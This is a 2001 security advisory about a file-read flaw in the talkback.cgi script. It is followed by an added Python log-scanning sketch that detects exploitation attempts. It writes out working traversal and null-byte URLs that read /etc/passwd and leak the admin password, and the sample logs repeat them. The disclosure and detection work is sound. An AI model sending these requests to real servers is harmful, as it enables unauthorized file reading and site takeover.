talkback.cgi vulnerability may allow users to read any file

2001-04-10T00:00:00
ID SECURITYVULNS:DOC:1487
Type securityvulns
Reporter Securityvulns
Modified 2001-04-10T00:00:00

Description

[whizkunde security advisory: talkback (CGI)]
http://www.whizkunde.org | stan@whizkunde.org

Release date: April 9th 2001
Subject: talkback.cgi security problem
Systems affected: UNIX systems running talkback CGI script
Vendor: http://www.waytotheweb.com


  1. problem

Talkback.cgi may allow remote users (website visitors) to view any file on a webserver (depending on the user the webserver is running as).

Consider this URL:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1

This will display /etc/passwd (if the webserver user has access to this file).

Another URL can display the source of talkback.cgi itself that contains the admin password:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=../cgi-bin/talkback.cgi%00&action=view&matchview=1

(You might have to use another URL instead of ../cgi-bin/talkback.cgi%00; this depends on where the cgi-bin is installed.)

In this file you can find $admin_password that can be used in

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin

to post & delete articles.

  2. fix

Way To The Web has released an updated version of talkback.cgi that isn't vulnerable to this problem:

http://www.waytotheweb.com/webscripts/talkback.htm
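
Sites that ran the vulnerable version can search their web server access logs for the request shape described in section 1. The following Python sketch is an added example, not part of the original advisory or the vendor's code; the common/combined log format, the sample log lines and the benign article name `news42` are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Request field of a common/combined access-log line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def article_findings(target):
    """Return the reasons the 'article' parameter of a talkback.cgi request is suspect."""
    parts = urlsplit(target)
    if not parts.path.endswith("/talkback.cgi"):
        return []
    findings = []
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        # Percent-decode once, as a CGI parameter parser would; work on bytes
        # so a decoded NUL stays visible.
        if unquote_to_bytes(name) != b"article":
            continue
        value = unquote_to_bytes(raw.replace("+", " ")).strip()
        if b"\x00" in value:
            findings.append("null byte")
        if b".." in re.split(rb"[/\\]", value):
            findings.append("directory traversal")
        if value.startswith(b"/"):
            findings.append("absolute path")
    return findings

def scan(lines):
    """Return (line_number, client, findings) for each suspicious log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = article_findings(match.group(1))
        if findings:
            hits.append((number, line.split()[0], findings))
    return hits

# Constructed sample log lines (documentation addresses, invented article name).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Apr/2001:10:00:00 +0000] "GET /cgi-bin/talkback.cgi?article=news42&action=view&matchview=1 HTTP/1.0" 200 5120',
    '198.51.100.7 - - [10/Apr/2001:10:01:12 +0000] "GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 200 1432',
    '198.51.100.7 - - [10/Apr/2001:10:01:40 +0000] "GET /cgi-bin/talkback.cgi?article=../cgi-bin/talkback.cgi%00&action=view&matchview=1 HTTP/1.0" 200 20480',
    '192.0.2.10 - - [10/Apr/2001:10:02:00 +0000] "GET /index.html?article=../x HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for number, client, findings in scan(SAMPLE_LOG):
        print(f"line {number}: {client}: {', '.join(findings)}")
```

A hit on the second request shape means the script source, including $admin_password, should be treated as disclosed and the password changed after upgrading.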


Stan a.k.a. ThePike
stan@whizkunde.org
http://www.whizkunde.org

Copyright whizkunde security team 2001